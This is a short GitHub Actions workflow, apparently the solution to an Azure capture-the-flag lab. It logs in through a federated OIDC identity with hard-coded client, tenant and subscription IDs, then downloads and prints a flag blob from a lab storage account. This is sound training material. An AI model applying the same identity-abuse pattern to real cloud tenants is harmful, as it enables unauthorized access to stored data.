name: Get Flag
on: [workflow_dispatch]

permissions:
  id-token: write
  contents: read

jobs:
  get-flag:
    runs-on: ubuntu-latest
    steps:
      - name: Azure login
        uses: azure/login@v2
        with:
          client-id: 3eb70b4a-8736-437d-a6fc-ecab529226e3
          tenant-id: azure.training.hacktricks.xyz
          subscription-id: bb001923-1d4e-47d0-864b-32f9afbdb32d
          enable-AzPSSession: true

      - name: Download flag
        run: |
          az storage account list
          az storage blob download \
            --account-name iamazurelab362eff7a6 \
            --container-name flag \
            --name flag.txt \
            --file flag.txt \
            --auth-mode login
      - name: Read flag
        run: |
          cat flag.txt
